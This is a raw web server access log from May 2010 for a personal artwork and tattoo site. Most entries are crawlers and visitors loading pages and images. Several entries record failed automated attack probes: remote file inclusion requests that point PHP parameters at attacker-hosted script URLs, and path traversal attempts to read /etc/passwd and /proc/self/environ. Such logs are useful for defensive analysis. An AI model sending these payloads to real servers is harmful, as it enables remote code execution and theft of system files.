87.250.255.243 - - [03/May/2010:19:00:37 -0500] "GET /logs/access_log.1270512000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
124.115.6.16 - - [03/May/2010:19:02:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Sosospider+(+http://help.soso.com/webspider.htm)"
68.57.157.118 - - [03/May/2010:19:04:54 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
70.20.17.16 - - [03/May/2010:19:05:31 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "http://www.bing.com/images/search?q=noahs+ark+wood+toy&go=&form=QBIR&qs=n&sk=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:31 -0500] "GET /artwork/blocks2.png HTTP/1.1" 200 26605 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:32 -0500] "GET /artwork/blocks1.png HTTP/1.1" 200 30135 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:32 -0500] "GET /artwork/family.jpg HTTP/1.1" 200 15546 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:32 -0500] "GET /artwork/mixnmatchanimals2.gif HTTP/1.1" 200 63914 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:32 -0500] "GET /artwork/ark2.gif HTTP/1.1" 200 81971 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:32 -0500] "GET /artwork/arkanimals1.gif HTTP/1.1" 200 76485 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:32 -0500] "GET /artwork/block-set2.jpg HTTP/1.1" 200 67585 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.20.17.16 - - [03/May/2010:19:05:33 -0500] "GET /artwork/rocking-mc.jpg HTTP/1.1" 200 66440 "http://tomdolan.pconline.com/artwork/toys.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
67.195.112.180 - - [03/May/2010:19:06:23 -0500] "GET /logs/access_log.1216944000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.189.224.16 - - [03/May/2010:19:19:03 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 308 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [03/May/2010:19:19:03 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 313 "-""Mozilla/4.61 (Macintosh; I; PPC)"
67.195.112.180 - - [03/May/2010:19:19:19 -0500] "GET /logs/access_log.1225756800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.111.36.26 - - [03/May/2010:19:22:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
114.111.36.26 - - [03/May/2010:19:22:36 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
77.221.130.10 - - [03/May/2010:19:27:11 -0500] "GET //admin/admin_news_bot.php?root_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.10 - - [03/May/2010:19:27:11 -0500] "GET /logs/access_log.1266710400//admin/admin_news_bot.php?root_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.10 - - [03/May/2010:19:27:11 -0500] "GET /logs//admin/admin_news_bot.php?root_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.221.130.10 - - [03/May/2010:19:27:12 -0500] "GET //admin/admin_news_bot.php?root_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.10 - - [03/May/2010:19:27:12 -0500] "GET /logs/access_log.1266710400//admin/admin_news_bot.php?root_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.10 - - [03/May/2010:19:27:12 -0500] "GET /logs//admin/admin_news_bot.php?root_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.199.179 - - [03/May/2010:19:33:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [03/May/2010:19:36:38 -0500] "GET /artwork/coffins.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
184.72.1.97 - - [03/May/2010:19:38:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (X11; U; Linux i686; c) AppleWebKit/531.2+ (KHTML, like Gecko) Safari/531.2+"
184.72.1.97 - - [03/May/2010:19:38:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; c) AppleWebKit/531.2+ (KHTML, like Gecko) Safari/531.2+"
207.46.204.185 - - [03/May/2010:19:43:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.185 - - [03/May/2010:19:43:54 -0500] "GET /logs/access_log.1267660800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
151.1.253.1 - - [03/May/2010:19:45:04 -0500] "GET /logs/access_log.1208649600/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:19:45:04 -0500] "GET /logs/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:19:45:04 -0500] "GET /index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:19:45:04 -0500] "GET /logs/access_log.1207699200/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.218.116.130 - - [03/May/2010:19:46:44 -0500] "GET /logs/access_log.1214006400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.172.232.251 - - [03/May/2010:19:47:15 -0500] "GET /index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:19:47:15 -0500] "GET /logs/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:19:47:17 -0500] "GET /logs/access_log.1208649600/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:19:47:17 -0500] "GET /logs/access_log.1270857600/index1.php?x=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.218.116.132 - - [03/May/2010:19:49:59 -0500] "GET /logs/access_log.1244678400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.189.224.16 - - [03/May/2010:19:53:22 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 313 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [03/May/2010:19:53:22 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 308 "-""Mozilla/4.61 (Macintosh; I; PPC)"
207.46.13.98 - - [03/May/2010:19:53:24 -0500] "GET /logs/access_log.1179705600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [03/May/2010:19:58:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.129.119.12 - - [03/May/2010:19:58:38 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
202.72.242.242 - - [03/May/2010:20:00:18 -0500] "GET /logs//index.php?option=com_proofreader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.72.242.242 - - [03/May/2010:20:00:18 -0500] "GET //index.php?option=com_proofreader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.195.112.180 - - [03/May/2010:20:03:45 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
151.1.253.1 - - [03/May/2010:20:08:23 -0500] "GET /logs/homepage.php?sel=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:20:08:23 -0500] "GET /homepage.php?sel=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
151.1.253.1 - - [03/May/2010:20:08:23 -0500] "GET /logs/access_log.1270857600/homepage.php?sel=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
119.63.193.56 - - [03/May/2010:20:10:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
211.172.232.251 - - [03/May/2010:20:11:07 -0500] "GET /homepage.php?sel=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:20:11:07 -0500] "GET /logs/homepage.php?sel=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
211.172.232.251 - - [03/May/2010:20:11:07 -0500] "GET /logs/access_log.1270857600/homepage.php?sel=http://www.thaismecity.com/thaismejob/include/idv6.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
87.250.255.243 - - [03/May/2010:20:11:49 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
218.38.34.19 - - [03/May/2010:20:12:06 -0500] "GET /logs/access_log.1265241600///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:20:12:06 -0500] "GET ///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:20:12:06 -0500] "GET /logs///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:20:12:13 -0500] "GET /logs/access_log.1264377600///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.222.56.62 - - [03/May/2010:20:18:15 -0500] "GET /logs//index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.222.56.62 - - [03/May/2010:20:18:16 -0500] "GET //index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [03/May/2010:20:19:08 -0500] "GET /logs/access_log.1158796800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.240 - - [03/May/2010:20:27:24 -0500] "GET /logs/access_log.1263600000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.189.224.16 - - [03/May/2010:20:28:31 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 308 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [03/May/2010:20:28:31 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 313 "-""Mozilla/4.61 (Macintosh; I; PPC)"
208.115.111.248 - - [03/May/2010:20:34:50 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:20:34:55 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
218.38.34.19 - - [03/May/2010:20:42:40 -0500] "GET /logs///skin/ggambo5100_board/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:20:42:40 -0500] "GET /logs/access_log.1266710400///skin/ggambo5100_board/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:20:42:40 -0500] "GET ///skin/ggambo5100_board/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.46.204.244 - - [03/May/2010:20:42:54 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [03/May/2010:20:43:32 -0500] "GET //stats/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.222.56.62 - - [03/May/2010:20:44:12 -0500] "GET /logs//stats/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.222.56.62 - - [03/May/2010:20:44:12 -0500] "GET //stats/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [03/May/2010:20:45:21 -0500] "GET /logs/access_log.1231804800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [03/May/2010:20:45:24 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
213.189.224.16 - - [03/May/2010:20:45:47 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 293 "-""Mozilla/4.61 (Macintosh; I; PPC)"
213.189.224.16 - - [03/May/2010:20:45:47 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 298 "-""Mozilla/4.61 (Macintosh; I; PPC)"
216.129.119.42 - - [03/May/2010:20:49:28 -0500] "GET /artwork/index.htm HTTP/1.1" 200 11078 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.185 - - [03/May/2010:20:52:24 -0500] "GET /logs/access_log.1245801600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.188.116.16 - - [03/May/2010:21:00:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tattoos.lovetoknow.com/Art_Designs""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.117.72 - - [03/May/2010:21:00:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.207 - - [03/May/2010:21:00:37 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.6 - - [03/May/2010:21:00:38 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.196 - - [03/May/2010:21:00:38 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.197 - - [03/May/2010:21:00:38 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.198 - - [03/May/2010:21:00:38 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.199 - - [03/May/2010:21:00:38 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.200 - - [03/May/2010:21:00:38 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.201 - - [03/May/2010:21:00:39 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.202 - - [03/May/2010:21:00:39 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.203 - - [03/May/2010:21:00:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.204 - - [03/May/2010:21:00:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.208 - - [03/May/2010:21:01:03 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.117.68 - - [03/May/2010:21:01:03 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.198 - - [03/May/2010:21:01:03 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.199 - - [03/May/2010:21:01:03 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.200 - - [03/May/2010:21:01:03 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.201 - - [03/May/2010:21:01:04 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.202 - - [03/May/2010:21:01:04 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.203 - - [03/May/2010:21:01:04 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.188.11.86 - - [03/May/2010:21:01:04 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.205 - - [03/May/2010:21:01:04 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.204 - - [03/May/2010:21:01:04 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.206 - - [03/May/2010:21:01:05 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.209 - - [03/May/2010:21:01:33 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.9 - - [03/May/2010:21:01:33 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
205.188.116.199 - - [03/May/2010:21:01:33 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
